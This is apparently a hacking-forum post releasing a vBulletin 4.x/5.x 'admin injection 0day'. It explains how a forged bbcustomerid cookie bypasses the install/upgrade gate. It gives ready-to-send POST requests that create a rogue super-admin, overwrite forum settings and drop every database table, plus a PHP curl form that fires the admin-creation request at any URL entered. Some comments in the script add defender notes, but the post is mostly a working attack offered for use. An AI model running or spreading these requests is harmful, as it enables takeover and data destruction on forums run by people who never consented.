Time to release this bitch…
Video: http://belegit.net/vBulletin_Upgrade…e_Exploit.html
Code:
# Exploit Title: vBulletin Admin Injection 0day # Date: 22/08/2013 # Author(s): BoxHead # Website: http://belegit.net # Product: vBulletin # Software Version 4.1.x< & 5.x.x # Thanks Ghost for writing the text file up for me :) + Enjoy the PHP script which makes it 100x easier to use.... Where it's vuln ---------------- # in vbulletin-upgrade.js The md5 hash of the customer number is set as a cookie after successfully entering into install/upgrade area. &firstrun=true&step=1 &customerid=" + PHP.urlencode(CUSTNUMBER) +"&firstrun=true&step=1&startat=0&only=0 setcookie('bbcustomerid', $this->custnumber, 0, '/', ''); # in class_upgrade_ajax.php the customer number hash is present and can be viewed in the source of install.php and upgrade.php next to VAR CUSTOMERID $this->custnumber = (strlen('f2b7ed1958f6d313a01814de73f0e3f5') == 32) ? 'f2b7ed1958f6d313a01814de73f0e3f5' : md5(strtoupper('f2b7ed1958f6d313a01814de73f0e3f5')); # Combining these 2 facts means it's possible to bypass the customer number pop up by creating a cookie called bbcustomerid with the hash as its contents. # vBulletin is tricked into believing you have already successfully entered the correct customer number into the login screen and allows you to continue. 
------------------------------------------------------------- Step 1 = Cookie Created with original MD5 Hash (Bypass Panel) ------------------------------------------------------------- customerid=J728354D506F&step=0&startat=0&only=0 Set-Cookie: bbcustomerid=f2b7ed1958f6d313a01814de73f0e3f5; path=/ ------------------------------------------------- Step 2 = install/upgrade.php (Add New Super User) ------------------------------------------------- Submit the POST POST DATA: ajax=1&version=install&checktable=false&firstrun=false&step=7&startat=0&only=false&customerid=f2b7ed1958f6d313a01814de73f0e3f5&options[skiptemplatemerge]=0&&response=yes&htmlsubmit=1&htmldata[username]=TheJoker&htmldata[password]=lulz&htmldata[confirmpassword]=lulz&htmldata[email][email protected]& # ajax=1 (Assuming it means ajax is enabled) # &version=install (First stage of installation process) # &checktable=false # &firstrun=false (Enables Full Install, not just Template Upgrades) # &step=7 (Step in installation phase that creates Admin account) # &startat=0 (Never changes, Dunno why) # &only=false (Fuck knows) # &customerid= (Substitute for the value in bbcustomerid cookie) # &options[skiptemplatemerge]=0 (Not a clue if we really need it, doubt it) # &&response=yes # &htmlsubmit=1 (Submits New User Data) # &htmldata[username]= (The User you want to add) # &htmldata[password]= (Set Password for User in Plaintext) # &htmldata[confirmpassword]= (Must match above) # &htmldata[email]= (Set email for User) ------------------------------------------------- Step 2 = install/upgrade.php (Edit Forum Options) ------------------------------------------------- Submit the POST POST DATA: 
ajax=1&version=install&checktable=false&firstrun=false&step=5&startat=0&only=false&customerid=f2b7ed1958f6d313a01814de73f0e3f5&options[skiptemplatemerge]=0&&response=yes&htmlsubmit=1&htmldata[bbtitle]=Forums&htmldata[hometitle]=Home&htmldata[bburl]=http%3A//www.homepage.com/forum.php&htmldata[homeurl]=http%3A//www.homepage.com&htmldata[webmasteremail][email protected] # ajax=1 (Assuming it means ajax is enabled) # &version=install (First stage of installation process) # &checktable=false # &firstrun=false (Enables Full Install, not just Template Upgrades) # &step=5 (Step in installation phase that edits Forum Options) # &startat=0 (Never changes, Dunno why) # &only=false (Fuck knows) # &customerid= (Substitute for the value in bbcustomerid cookie) # &options[skiptemplatemerge]=0 (Not a clue if we really need it, doubt it) # &&response=yes # &htmlsubmit=1 (Submits New User Data) # &htmldata[bbtitle]= (Board Title) # &htmldata[hometitle]= (Homepage Title) # &htmldata[bburl]= (Forum Url) # &htmldata[homeurl]= (Homepage Url) # &htmldata[webmasteremail]= (Webmasters Email) --------------------------------------------- Step 2 = install/upgrade.php (Clear Database) --------------------------------------------- Submit the POST POST DATA: 
ajax=1&version=install&checktable=false&firstrun=false&step=1&startat=0&only=false&customerid=f2b7ed1958f6d313a01814de73f0e3f5&options[skiptemplatemerge]=0&&response=yes&htmlsubmit=1&htmldata[]=access&htmldata[]=action&htmldata[]=activitystream&htmldata[]=activitystreamtype&htmldata[]=ad&htmldata[]=adcriteria&htmldata[]=adminhelp&htmldata[]=administrator&htmldata[]=adminlog&htmldata[]=adminmessage&htmldata[]=adminutil&htmldata[]=album&htmldata[]=albumupdate&htmldata[]=announcement&htmldata[]=announcementread&htmldata[]=apiclient&htmldata[]=apilog&htmldata[]=apipost&htmldata[]=attachment&htmldata[]=attachmentcategory&htmldata[]=attachmentcategoryuser&htmldata[]=attachmentpermission&htmldata[]=attachmenttype&htmldata[]=attachmentviews&htmldata[]=autosave&htmldata[]=avatar&htmldata[]=bbcode&htmldata[]=bbcode_video&htmldata[]=block&htmldata[]=blockconfig&htmldata[]=blocktype&htmldata[]=blog&htmldata[]=blog_attachmentlegacy&htmldata[]=blog_category&htmldata[]=blog_categorypermission&htmldata[]=blog_categoryuser&htmldata[]=blog_custom_block&htmldata[]=blog_custom_block_parsed&htmldata[]=blog_deletionlog&htmldata[]=blog_editlog&htmldata[]=blog_featured&htmldata[]=blog_groupmembership&htmldata[]=blog_grouppermission&htmldata[]=blog_hash&htmldata[]=blog_moderation&htmldata[]=blog_moderator&htmldata[]=blog_pinghistory&htmldata[]=blog_rate&htmldata[]=blog_read&htmldata[]=blog_relationship&htmldata[]=blog_search&htmldata[]=blog_searchresult&htmldata[]=blog_sitemapconf&htmldata[]=blog_subscribeentry&htmldata[]=blog_subscribeuser&htmldata[]=blog_summarystats&htmldata[]=blog_tachyentry&htmldata[]=blog_text&htmldata[]=blog_textparsed&htmldata[]=blog_trackback&htmldata[]=blog_trackbacklog&htmldata[]=blog_user&htmldata[]=blog_usercss&htmldata[]=blog_usercsscache&htmldata[]=blog_userread&htmldata[]=blog_userstats&htmldata[]=blog_views&htmldata[]=blog_visitor&htmldata[]=bookmarksite&htmldata[]=cache&htmldata[]=cacheevent&htmldata[]=calendar&htmldata[]=calendarcustomfield&htmldata[]=cal
endarmoderator&htmldata[]=calendarpermission&htmldata[]=cms_article&htmldata[]=cms_category&htmldata[]=cms_grid&htmldata[]=cms_layout&htmldata[]=cms_layoutwidget&htmldata[]=cms_navigation&htmldata[]=cms_node&htmldata[]=cms_nodecategory&htmldata[]=cms_nodeconfig&htmldata[]=cms_nodeinfo&htmldata[]=cms_permissions&htmldata[]=cms_rate&htmldata[]=cms_sectionorder&htmldata[]=cms_widget&htmldata[]=cms_widgetconfig&htmldata[]=cms_widgettype&htmldata[]=contentpriority&htmldata[]=contentread&htmldata[]=contenttype&htmldata[]=cpsession&htmldata[]=cron&htmldata[]=cronlog&htmldata[]=customavatar&htmldata[]=customprofile&htmldata[]=customprofilepic&htmldata[]=datastore&htmldata[]=dbquery&htmldata[]=deletionlog&htmldata[]=discussion&htmldata[]=discussionread&htmldata[]=editlog&htmldata[]=event&htmldata[]=externalcache&htmldata[]=faq&htmldata[]=filedata&htmldata[]=forum&htmldata[]=forumpermission&htmldata[]=forumprefixset&htmldata[]=forumread&htmldata[]=forumrunner_push_data&htmldata[]=forumrunner_push_users&htmldata[]=groupmessage&htmldata[]=groupmessage_hash&htmldata[]=groupread&htmldata[]=holiday&htmldata[]=humanverify&htmldata[]=hvanswer&htmldata[]=hvquestion&htmldata[]=icon&htmldata[]=imagecategory&htmldata[]=imagecategorypermission&htmldata[]=indexqueue&htmldata[]=infraction&htmldata[]=infractionban&htmldata[]=infractiongroup&htmldata[]=infractionlevel&htmldata[]=ipdata&htmldata[]=language&htmldata[]=mailqueue&htmldata[]=moderation&htmldata[]=moderator&htmldata[]=moderatorlog&htmldata[]=navigation&htmldata[]=notice&htmldata[]=noticecriteria&htmldata[]=noticedismissed&htmldata[]=package&htmldata[]=passwordhistory&htmldata[]=paymentapi&htmldata[]=paymentinfo&htmldata[]=paymenttransaction&htmldata[]=phrase&htmldata[]=phrasetype&htmldata[]=picturecomment&htmldata[]=picturecomment_hash&htmldata[]=picturelegacy&htmldata[]=plugin&htmldata[]=pm&htmldata[]=pmreceipt&htmldata[]=pmtext&htmldata[]=pmthrottle&htmldata[]=podcast&htmldata[]=podcastitem&htmldata[]=poll&htmldata[]=pollvote&ht
mldata[]=post&htmldata[]=postedithistory&htmldata[]=posthash&htmldata[]=postlog&htmldata[]=postparsed&htmldata[]=postrelease&htmldata[]=prefix&htmldata[]=prefixpermission&htmldata[]=prefixset&htmldata[]=product&htmldata[]=productcode&htmldata[]=productdependency&htmldata[]=profileblockprivacy&htmldata[]=profilefield&htmldata[]=profilefieldcategory&htmldata[]=profilevisitor&htmldata[]=ranks&htmldata[]=reminder&htmldata[]=reputation&htmldata[]=reputationlevel&htmldata[]=route&htmldata[]=rssfeed&htmldata[]=rsslog&htmldata[]=searchcore&htmldata[]=searchcore_text&htmldata[]=searchgroup&htmldata[]=searchgroup_text&htmldata[]=searchlog&htmldata[]=session&htmldata[]=setting&htmldata[]=settinggroup&htmldata[]=sigparsed&htmldata[]=sigpic&htmldata[]=skimlinks&htmldata[]=smilie&htmldata[]=socialgroup&htmldata[]=socialgroupcategory&htmldata[]=socialgroupicon&htmldata[]=socialgroupmember&htmldata[]=spamlog&htmldata[]=stats&htmldata[]=strikes&htmldata[]=style&htmldata[]=stylevar&htmldata[]=stylevardfn&htmldata[]=subscribediscussion&htmldata[]=subscribeevent&htmldata[]=subscribeforum&htmldata[]=subscribegroup&htmldata[]=subscribethread&htmldata[]=subscription&htmldata[]=subscriptionlog&htmldata[]=subscriptionpermission&htmldata[]=tachyforumcounter&htmldata[]=tachyforumpost&htmldata[]=tachythreadcounter&htmldata[]=tachythreadpost&htmldata[]=tag&htmldata[]=tagcontent&htmldata[]=tagsearch&htmldata[]=template&htmldata[]=templatehistory&htmldata[]=templatemerge&htmldata[]=thread&htmldata[]=threadrate&htmldata[]=threadread&htmldata[]=threadredirect&htmldata[]=threadviews&htmldata[]=upgradelog&htmldata[]=user&htmldata[]=useractivation&htmldata[]=userban&htmldata[]=userchangelog&htmldata[]=usercss&htmldata[]=usercsscache&htmldata[]=userfield&htmldata[]=usergroup&htmldata[]=usergroupleader&htmldata[]=usergrouprequest&htmldata[]=userlist&htmldata[]=usernote&htmldata[]=userpromotion&htmldata[]=usertextfield&htmldata[]=usertitle&htmldata[]=visitormessage&htmldata[]=visitormessage_hash& # 
ajax=1 (Assuming it means ajax is enabled) # &version=install (First stage of installation process) # &checktable=false # &firstrun=false (Enables Full Install, not just Template Upgrades) # &step=1 (Step in installation phase that removes tables) # &startat=0 (Never changes, Dunno why) # &only=false (Fuck knows) # &customerid= (Substitute for the value in bbcustomerid cookie) # &options[skiptemplatemerge]=0 (Not a clue if we really need it, doubt it) # &&response=yes # &htmlsubmit=1 (Submits New User Data) # &htmldata[]= (Select Tables - See below) &htmldata[]=access &htmldata[]=action &htmldata[]=activitystream &htmldata[]=activitystreamtype &htmldata[]=ad &htmldata[]=adcriteria &htmldata[]=adminhelp &htmldata[]=administrator &htmldata[]=adminlog &htmldata[]=adminmessage &htmldata[]=adminutil &htmldata[]=album &htmldata[]=albumupdate &htmldata[]=announcement &htmldata[]=announcementread &htmldata[]=apiclient &htmldata[]=apilog &htmldata[]=apipost &htmldata[]=attachment &htmldata[]=attachmentcategory &htmldata[]=attachmentcategoryuser &htmldata[]=attachmentpermission &htmldata[]=attachmenttype &htmldata[]=attachmentviews &htmldata[]=autosave &htmldata[]=avatar &htmldata[]=bbcode &htmldata[]=bbcode_video &htmldata[]=block &htmldata[]=blockconfig &htmldata[]=blocktype &htmldata[]=blog &htmldata[]=blog_attachmentlegacy &htmldata[]=blog_category &htmldata[]=blog_categorypermission &htmldata[]=blog_categoryuser &htmldata[]=blog_custom_block &htmldata[]=blog_custom_block_parsed &htmldata[]=blog_deletionlog &htmldata[]=blog_editlog &htmldata[]=blog_featured &htmldata[]=blog_groupmembership &htmldata[]=blog_grouppermission &htmldata[]=blog_hash &htmldata[]=blog_moderation &htmldata[]=blog_moderator &htmldata[]=blog_pinghistory &htmldata[]=blog_rate &htmldata[]=blog_read &htmldata[]=blog_relationship &htmldata[]=blog_search &htmldata[]=blog_searchresult &htmldata[]=blog_sitemapconf &htmldata[]=blog_subscribeentry &htmldata[]=blog_subscribeuser &htmldata[]=blog_summarystats 
&htmldata[]=blog_tachyentry &htmldata[]=blog_text &htmldata[]=blog_textparsed &htmldata[]=blog_trackback &htmldata[]=blog_trackbacklog &htmldata[]=blog_user &htmldata[]=blog_usercss &htmldata[]=blog_usercsscache &htmldata[]=blog_userread &htmldata[]=blog_userstats &htmldata[]=blog_views &htmldata[]=blog_visitor &htmldata[]=bookmarksite &htmldata[]=cache &htmldata[]=cacheevent &htmldata[]=calendar &htmldata[]=calendarcustomfield &htmldata[]=calendarmoderator &htmldata[]=calendarpermission &htmldata[]=cms_article &htmldata[]=cms_category &htmldata[]=cms_grid &htmldata[]=cms_layout &htmldata[]=cms_layoutwidget &htmldata[]=cms_navigation &htmldata[]=cms_node &htmldata[]=cms_nodecategory &htmldata[]=cms_nodeconfig &htmldata[]=cms_nodeinfo &htmldata[]=cms_permissions &htmldata[]=cms_rate &htmldata[]=cms_sectionorder &htmldata[]=cms_widget &htmldata[]=cms_widgetconfig &htmldata[]=cms_widgettype &htmldata[]=contentpriority &htmldata[]=contentread &htmldata[]=contenttype &htmldata[]=cpsession &htmldata[]=cron &htmldata[]=cronlog &htmldata[]=customavatar &htmldata[]=customprofile &htmldata[]=customprofilepic &htmldata[]=datastore &htmldata[]=dbquery &htmldata[]=deletionlog &htmldata[]=discussion &htmldata[]=discussionread &htmldata[]=editlog &htmldata[]=event &htmldata[]=externalcache &htmldata[]=faq &htmldata[]=filedata &htmldata[]=forum &htmldata[]=forumpermission &htmldata[]=forumprefixset &htmldata[]=forumread &htmldata[]=forumrunner_push_data &htmldata[]=forumrunner_push_users &htmldata[]=groupmessage &htmldata[]=groupmessage_hash &htmldata[]=groupread &htmldata[]=holiday &htmldata[]=humanverify &htmldata[]=hvanswer &htmldata[]=hvquestion &htmldata[]=icon &htmldata[]=imagecategory &htmldata[]=imagecategorypermission &htmldata[]=indexqueue &htmldata[]=infraction &htmldata[]=infractionban &htmldata[]=infractiongroup &htmldata[]=infractionlevel &htmldata[]=ipdata &htmldata[]=language &htmldata[]=mailqueue &htmldata[]=moderation &htmldata[]=moderator 
&htmldata[]=moderatorlog &htmldata[]=navigation &htmldata[]=notice &htmldata[]=noticecriteria &htmldata[]=noticedismissed &htmldata[]=package &htmldata[]=passwordhistory &htmldata[]=paymentapi &htmldata[]=paymentinfo &htmldata[]=paymenttransaction &htmldata[]=phrase &htmldata[]=phrasetype &htmldata[]=picturecomment &htmldata[]=picturecomment_hash &htmldata[]=picturelegacy &htmldata[]=plugin &htmldata[]=pm &htmldata[]=pmreceipt &htmldata[]=pmtext &htmldata[]=pmthrottle &htmldata[]=podcast &htmldata[]=podcastitem &htmldata[]=poll &htmldata[]=pollvote &htmldata[]=post &htmldata[]=postedithistory &htmldata[]=posthash &htmldata[]=postlog &htmldata[]=postparsed &htmldata[]=postrelease &htmldata[]=prefix &htmldata[]=prefixpermission &htmldata[]=prefixset &htmldata[]=product &htmldata[]=productcode &htmldata[]=productdependency &htmldata[]=profileblockprivacy &htmldata[]=profilefield &htmldata[]=profilefieldcategory &htmldata[]=profilevisitor &htmldata[]=ranks &htmldata[]=reminder &htmldata[]=reputation &htmldata[]=reputationlevel &htmldata[]=route &htmldata[]=rssfeed &htmldata[]=rsslog &htmldata[]=searchcore &htmldata[]=searchcore_text &htmldata[]=searchgroup &htmldata[]=searchgroup_text &htmldata[]=searchlog &htmldata[]=session &htmldata[]=setting &htmldata[]=settinggroup &htmldata[]=sigparsed &htmldata[]=sigpic &htmldata[]=skimlinks &htmldata[]=smilie &htmldata[]=socialgroup &htmldata[]=socialgroupcategory &htmldata[]=socialgroupicon &htmldata[]=socialgroupmember &htmldata[]=spamlog &htmldata[]=stats &htmldata[]=strikes &htmldata[]=style &htmldata[]=stylevar &htmldata[]=stylevardfn &htmldata[]=subscribediscussion &htmldata[]=subscribeevent &htmldata[]=subscribeforum &htmldata[]=subscribegroup &htmldata[]=subscribethread &htmldata[]=subscription &htmldata[]=subscriptionlog &htmldata[]=subscriptionpermission &htmldata[]=tachyforumcounter &htmldata[]=tachyforumpost &htmldata[]=tachythreadcounter &htmldata[]=tachythreadpost &htmldata[]=tag &htmldata[]=tagcontent 
&htmldata[]=tagsearch &htmldata[]=template &htmldata[]=templatehistory &htmldata[]=templatemerge &htmldata[]=thread &htmldata[]=threadrate &htmldata[]=threadread &htmldata[]=threadredirect &htmldata[]=threadviews &htmldata[]=upgradelog &htmldata[]=user &htmldata[]=useractivation &htmldata[]=userban &htmldata[]=userchangelog &htmldata[]=usercss &htmldata[]=usercsscache &htmldata[]=userfield &htmldata[]=usergroup &htmldata[]=usergroupleader &htmldata[]=usergrouprequest &htmldata[]=userlist &htmldata[]=usernote &htmldata[]=userpromotion &htmldata[]=usertextfield &htmldata[]=usertitle &htmldata[]=visitormessage &htmldata[]=visitormessage_hash ------------------------- Step 3 = XML Confirmation ------------------------- Confirmation of your request will inject data into the Database. --------------- Step 4 - Extras ---------------- Spawning of Persistent XSS in Titles SQL injection of other Admin Users
PHP Exploit Script
Code:
<!-- Static banner printed before the form handler runs. -->
<h1>vBulletin 4.1.x / 5.x.x Upgrade 0day Exploit</h1>
<p>Created by: Boxhead</p>
<p>Found on: 08/22/2013</p>
<p>Website: <a href="http://belegit.net" target="_blank">http://belegit.net</a></p>
<br>
<?php
// Form handler. When the form below is submitted it assembles the
// install/upgrade.php "step 7" request body from the form fields, attaches a
// 'bbcustomerid' cookie holding the submitted customer ID, and POSTs it with
// curl to the URL the user typed in. The response is never inspected.
//
// Defender notes: every field this handler sends is listed verbatim in $fields
// (step=7, htmlsubmit=1, htmldata[username]/[password]/[email]) together with
// a bbcustomerid cookie, so the traffic is straightforward to alert on at the
// web server or WAF. The request targets the install/ directory (see the
// example URL in the form), so deleting or access-restricting that directory
// once setup/upgrade is complete is the standard hardening step.
if(isset($_POST['submit'])){
    // Imports every POST key as a local variable. Nothing below reads those
    // locals (all values are re-read from $_POST); the only effect is that
    // caller-chosen keys can pre-seed variables such as $fields_string.
    extract($_POST);
    //set POST variables
    $url = $_POST['url'];
    $fields = array(
        'ajax' => urlencode('1'),
        'version' => urlencode('install'),
        'checktable' => urlencode('false'),
        'firstrun' => urlencode('false'),
        'step' => urlencode('7'),
        'startat' => urlencode('0'),
        'only' => urlencode('false'),
        'customerid' => urlencode($_POST['customerid']),
        'options[skiptemplatemerge]' => urlencode('0'),
        'response' => urlencode('yes'),
        'htmlsubmit' => urlencode('1'),
        'htmldata[username]' => urlencode($_POST['username']),
        'htmldata[password]' => urlencode($_POST['password']),
        'htmldata[confirmpassword]' => urlencode($_POST['password']),
        'htmldata[email]' => urlencode($_POST['email'])
    );
    //url-ify the data for the POST
    // $fields_string is not initialised before '.=' (PHP emits a notice on the
    // first iteration unless extract() above seeded it). The trailing '&' is
    // never removed because the rtrim() result below is discarded.
    foreach($fields as $key=>$value) { $fields_string .= $key.'='.$value.'&'; }
    rtrim($fields_string, '&');
    //open connection
    $ch = curl_init();
    //set the url, number of POST vars, POST data
    // CURLOPT_POST expects a bool; the non-zero count is treated as true.
    curl_setopt($ch,CURLOPT_URL, $url);
    curl_setopt($ch,CURLOPT_POST, count($fields));
    curl_setopt($ch,CURLOPT_POSTFIELDS, $fields_string);
    curl_setopt($ch, CURLOPT_COOKIESESSION, TRUE);
    // The cookie value is taken from the form as-is (no encoding).
    curl_setopt($ch, CURLOPT_COOKIE, 'bbcustomerid='.$_POST['customerid'] );
    //execute post
    // CURLOPT_RETURNTRANSFER is not set, so curl_exec() writes the response
    // body straight to this page and $result only holds true/false.
    $result = curl_exec($ch);
    //close connection
    curl_close($ch);
    exit();
}
?>
<center>
<!-- REQUEST_URI is echoed into the action attribute without
     htmlspecialchars(); a crafted request path can break out of the attribute
     (reflected XSS in this tool's own page). -->
<form name="sploit" method="POST" action="<?php echo $_SERVER['REQUEST_URI']; ?>">
<span>Example:http://test.com/forum/install/upgrade.php</span><br>
<span>Website:</span> <input name="url" type="text" tabindex="1" size="60" /> <br>
<span>Customer ID:</span> <input name="customerid" type="text" tabindex="2" size="40" /> <br>
<span>Username:</span> <input name="username" type="text" tabindex="3" size="40" /> <br>
<span>Password:</span> <input name="password" type="text" tabindex="4" size="40" /> <br>
<span>Email:</span> <input name="email" type="text" tabindex="5" maxlength="40" />
<input name="submit" type="submit" value="Inject Admin">
</form>
</center>